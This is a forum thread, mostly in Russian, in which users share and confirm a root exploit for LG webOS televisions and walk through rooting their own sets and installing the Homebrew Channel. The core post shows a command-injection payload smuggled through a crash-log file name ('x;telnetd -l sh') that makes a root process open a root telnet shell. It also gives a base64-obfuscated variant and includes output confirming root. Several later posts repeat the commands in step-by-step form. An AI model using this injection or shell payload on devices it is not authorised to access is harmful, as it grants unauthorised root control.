webOS Forums - форум пользователей телевизоров на webOS

[Whiterat]

(Извините за английский, это мой родной язык.)

New Root Method

Tested on an OLED65CX running 04.30.61.

• crashd runs as root, subscribed to inotify events for /var/log/crashd/$component_name
• remote diagnostics (rdxd) writes this supposed crash out to /tmp/rdxd/crash/crash.$foobar
• uploadd then kicks in to to send logs back to LG and part of that log collection process:
  
  • "sh -c cp /tmp/rdxd/crash/crash.$foobar /tmp/uploadd/$component_name"

That is running as root and we have full control of $component_name by means of whatever filename we stick in /var/log/crashd/

So...

Код: Выделить всё

$ touch /var/log/crashd/“x;telnetd -l sh”


Код: Выделить всё

$ ps -FC telnetd
UID PID PPID C SZ RSS PSR STIME TTY TIME CMD
root 12152 1 0 5592 816 2 01:35?  00:00:00 telnetd -l sh

Код: Выделить всё

whiterat@mbp:[~]$ telnet 10.1.161.192
Trying 10.1.161.192...
Connected to 10.1.161.192.
Escape character is '^]'.

webOS TV 5.3.0 LGwebOSTV

/ # uname -a
Linux LGwebOSTV 4.4.84-219.1.jasper.2 #1 SMP PREEMPT Thu Feb 24 09:02:14 UTC 2022 aarch64 GNU/Linux
/ # id
uid=0 (root) gid=0 (root)

It’s possible to have a longer initial payload with a “standard” base64 escape:

Код: Выделить всё

$ touch /var/log/crashd/"x;echo dGVsbmV0ZCAtbCAvYmluL3No | base64 -d | sh"

[JackSparrow]

Whiterat
Congrats! You gave a new hope to all who updated to unrootable firmware.
Waiting for it to be added to rootmy.tv.

[eugene2878]

eugene2878
То есть на 50NANO88 через rootmy.tv получилось получить рут?

Так точно.

[begemoth]

New Root Method

Tested on an OLED65CX running 04.30.61.

Получилось также на OLED55C1PVA / firmwareVersion: 03.30.20

Код: Выделить всё

$ telnet 10.14
Trying 10.0.0.14...
Connected to 10.14.
Escape character is '^]'.

webOS TV 6.3.0 home

ERROR: ld.so: object '$LD_PRELOAD' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
/ # uname -a
ERROR: ld.so: object '$LD_PRELOAD' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
Linux home 4.4.84-229.kcl4tv.5 #1 SMP PREEMPT Wed May 25 02:32:07 UTC 2022 aarch64 GNU/Linux
/ # id
ERROR: ld.so: object '$LD_PRELOAD' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
uid=0 (root) gid=0 (root)
/ #

[AMETKO]

New Root Method

На модели OLED 55C1 получен рут этим новым способом, вот порядок действий:

0. получаешь режим разработчика https://webostv.developer.lge.com/devel ... lg-account

1. ставишь консольного клиента webos-cli https://webostv.developer.lge.com/devel ... stallation

2. делаешь всё по инструкции "connecting with CLI" отсюда:
https://webostv.developer.lge.com/devel ... r-mode-app

3. коннектишься через ssh к телевизору

Код: Выделить всё

ssh prisoner@<TV-IP> -p 9922 -i <KEY-PATH> bash -i

(очевидно, что TV-IP и KEY-PATH надо подставлять свои. ключ выгружается на шаге 6. Get the key file from your webOS TV with the following command on your PC из п.2 этой инструкции)

4. приконнектившись через ssh применяешь эксплойт Whiterat @ [rootmy.tv] Как получить Root права на webOS, а именно выполняешь команду

Код: Выделить всё

touch /var/log/crashd/"x;telnetd -l sh"

. после этого на телеке временно запускается телнет-сервер с рутовым доступом

5. скачиваешь, распаковываешь и закидываешь IPK из промежуточной сборки homebrew-channel https://github.com/webosbrew/webos-home ... 2600999393

5. подключаешься к телевизору через телнет. там будет уже рутовая консоль

6. в консоли выполняешь команды из
https://github.com/webosbrew/webos-home ... nel#manual, но только те, что относятся к установке и подъёму привилегий (первые две). в первой команде очевидно надо поправить путь к файлу. в зависимости от того куда закинул

7. удаляешь в интерфейсе прилу developer-mode. убеждаешься, что файл /var/luna/preferences/devmode_enabled на месте

8. перезагружаешься

всё должно быть ОК - ssh / telnet работают, кружка на месте. проверено на прошивке 03.30.20 / OLED55C1PVA

(способы подключения через телнет, ssh, и заливки файлов могут отличаться в зависимости от того, что за клиенты у вас на руках. удобнее всего конечно линукс или 10-11 винда с WSL - там и SSH, и SFTP, и телнет под рукой)

добавил в authorized_keys ключик, ребутнулся ещё раз – всё нормально

п.с. Телек:
modelName: OLED55C1PVA
sdkVersion: 6.3.0
firmwareVersion: 03.30.20
boardType: O20N_DVB_EU
otaId: HE_DTV_W21O_AFABATAA

[JackSparrow]

кто не хочет разбираться с новым способом рута - пусть ждут rootmytv v3, разрабы обещают срок менее месяца до релиза

[numminorih]

New Root Method

6. в консоли выполняешь команды из
https://github.com/webosbrew/webos-home ... nel#manual, но только те, что относятся к установке и подъёму привилегий (первые две). в первой команде очевидно надо поправить путь к файлу. в зависимости от того куда закинул

не совсем понял синтаксис luna-send-pub -i 'luna://com.webos.appInstallService/dev/install' '{"id":"com.ares.defaultName", "ipkUrl":"/tmp/path/to/hbchannel.ipk", "subscribe":true}'`
ipk уже должен быть на телевизоре?
ибо по формату "luna-send-pub -i 'luna://com.webos.appInstallService/dev/install' '{"id":"com.ares.defaultName", "ipkUrl":"D:\tv\hbchannel.ipk", "subscribe":true}'`" не заработало

UPD:
Вместо этой строки установил кружку через webos-dev-manager.1.5.2 и всё заработало

[L1nk3R]

New Root Method

3. коннектишься через ssh к телевизору

Код: Выделить всё

ssh prisoner@<TV-IP> -p 9922 -i <KEY-PATH> bash -i

(очевидно, что TV-IP и KEY-PATH надо подставлять свои. ключ выгружается на шаге 6.Get the key file from your webOS TV with the following command on your PC из п.2 этой инструкции)

доброго времени! на этом пункте вываливается сообщение "Enter passphrase for key <путь к ключу>:", но ввести какие либо символы не позволяет ((
в чем может быть проблема? LG 55C1, прошивка 03.33.11

[numminorih]

7. удаляешь в интерфейсе прилу developer-mode. убеждаешься, что файл /var/luna/preferences/devmode_enabled на месте

после этого телнет перестает работать...

[polkilo08]

Добрый день, подскажите есть сейчас способ получить root и установить приложения Homebrew Channel; Lampa на телевизор 42LB653V-ZK с webos 1.4.0-2536 прошивка 05.05.90